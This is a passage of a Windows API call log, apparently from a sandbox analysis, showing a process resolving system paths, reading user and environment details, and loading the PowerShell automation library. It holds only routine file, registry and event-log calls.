(uMode=0x1) returned 0x1 [0153.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12e320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.948] GetLastError () returned 0xcb [0153.948] SetErrorMode (uMode=0x1) returned 0x1 [0153.948] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12e7a0 | out: lpFileInformation=0x12e7a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0153.948] GetLastError () returned 0xcb [0153.948] SetErrorMode (uMode=0x1) returned 0x1 [0153.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12e334, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.948] GetLastError () returned 0xcb [0153.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.948] GetLastError () returned 0xcb [0153.948] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12e32c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0153.948] GetLastError () returned 0xcb [0153.948] SetErrorMode (uMode=0x1) returned 0x1 [0153.948] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12e7ac | out: lpFileInformation=0x12e7ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x574268e0, ftLastAccessTime.dwHighDateTime=0x1d466db, ftLastWriteTime.dwLowDateTime=0x574268e0, ftLastWriteTime.dwHighDateTime=0x1d466db, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0153.948] GetLastError () returned 0xcb [0153.948] SetErrorMode (uMode=0x1) returned 0x1 [0153.948] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12e32c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0153.948] GetLastError () returned 0xcb [0153.948] SetErrorMode (uMode=0x1) returned 0x1 [0153.949] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12e7ac | out: lpFileInformation=0x12e7ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x574268e0, ftLastAccessTime.dwHighDateTime=0x1d466db, ftLastWriteTime.dwLowDateTime=0x574268e0, ftLastWriteTime.dwHighDateTime=0x1d466db, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0153.949] GetLastError () returned 0xcb [0153.949] SetErrorMode (uMode=0x1) returned 0x1 [0153.949] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12e340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0153.949] GetLastError () returned 0xcb [0153.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12e2dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0153.949] GetLastError () returned 0xcb [0153.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12e32c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.949] GetLastError () returned 0xcb [0153.949] SetErrorMode (uMode=0x1) returned 0x1 [0153.949] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12e7ac | out: lpFileInformation=0x12e7ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0153.949] GetLastError () returned 0xcb [0153.949] SetErrorMode (uMode=0x1) returned 0x1 [0153.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12e32c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.949] GetLastError () returned 0xcb [0153.949] SetErrorMode (uMode=0x1) returned 0x1 [0153.949] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12e7ac | out: lpFileInformation=0x12e7ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0153.949] GetLastError () returned 0xcb [0153.949] SetErrorMode (uMode=0x1) returned 0x1 [0153.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12e340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.950] GetLastError () returned 0xcb [0153.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12e2dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.950] GetLastError () returned 0xcb [0154.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12e3fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.003] GetLastError () returned 0xcb [0154.003] SetErrorMode (uMode=0x1) returned 0x1 [0154.003] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2c3c014 | out: lpFileInformation=0x2c3c014*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0154.003] GetLastError () returned 0xcb [0154.003] SetErrorMode (uMode=0x1) returned 0x1 [0154.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e444, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.005] GetLastError () returned 0xcb [0154.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.005] GetLastError () returned 0xcb [0154.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.005] GetLastError () returned 0xcb [0154.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.006] GetLastError () returned 0xcb [0154.104] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x50a468, nSize=0x12e998 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12e998) returned 0x1 [0154.138] GetLastError () returned 0xcb [0154.138] GetUserNameW (in: lpBuffer=0x509ca8, pcbBuffer=0x12e9a0 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12e9a0) returned 1 [0154.140] ReportEventW (hEventLog=0x4f20004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c5cd14*="Available", lpRawData=0x2c5cbd0) returned 1 [0154.166] GetLastError () returned 0x0 [0154.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.167] GetLastError () returned 0xcb [0154.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.167] GetLastError () returned 0xcb [0154.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.182] GetLastError () returned 0xcb [0154.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.182] GetLastError () returned 0xcb [0154.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.183] GetLastError () returned 0xcb [0154.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e41c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.189] GetLastError () returned 0xcb [0154.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.189] GetLastError () returned 0xcb [0154.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.190] GetLastError () returned 0xcb [0154.190] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0154.190] GetLastError () returned 0xcb [0154.190] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0154.190] GetLastError () returned 0xcb [0154.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e41c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.190] GetLastError () returned 0xcb [0154.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.190] GetLastError () returned 0xcb [0154.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.190] GetLastError () returned 0xcb [0154.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e41c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.190] GetLastError () returned 0xcb [0154.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.190] GetLastError () returned 0xcb [0154.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.191] GetLastError () returned 0xcb [0154.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e41c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.191] GetLastError () returned 0xcb [0154.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.191] GetLastError () returned 0xcb [0154.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.191] GetLastError () returned 0xcb [0154.191] GetCurrentProcessId () returned 0x5a8 [0154.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e41c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.191] GetLastError () returned 0xcb [0154.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.191] GetLastError () returned 0xcb [0154.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.191] GetLastError () returned 0xcb [0154.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e408, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.192] GetLastError () returned 0xcb [0154.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.192] GetLastError () returned 0xcb [0154.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.192] GetLastError () returned 0xcb [0154.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e408, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.192] GetLastError () returned 0xcb [0154.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.192] GetLastError () returned 0xcb [0154.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.192] GetLastError () returned 0xcb [0154.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e41c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.193] GetLastError () returned 0xcb [0154.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.193] GetLastError () returned 0xcb [0154.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.193] GetLastError () returned 0xcb [0154.193] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e92c | out: phkResult=0x12e92c*=0x398) returned 0x0 [0154.193] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e974, lpData=0x0, lpcbData=0x12e970*=0x0 | out: lpType=0x12e974*=0x1, lpData=0x0, lpcbData=0x12e970*=0x56) returned 0x0 [0154.193] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e974, lpData=0x509ca8, lpcbData=0x12e970*=0x56 | out: lpType=0x12e974*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12e970*=0x56) returned 0x0 [0154.194] RegCloseKey (hKey=0x398) returned 0x0 [0154.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e41c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.194] GetLastError () returned 0xcb [0154.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.194] GetLastError () returned 0xcb [0154.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.194] GetLastError () returned 0xcb [0154.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e404, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.195] GetLastError () returned 0xcb [0154.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.195] GetLastError () returned 0xcb [0154.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.195] GetLastError () returned 0xcb [0154.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.229] GetLastError () returned 0xcb [0154.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.230] GetLastError () returned 0xcb [0154.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.230] GetLastError () returned 0xcb [0154.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.230] GetLastError () returned 0xcb [0154.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.230] GetLastError () returned 0xcb [0154.230] GetFullPathNameW (in: 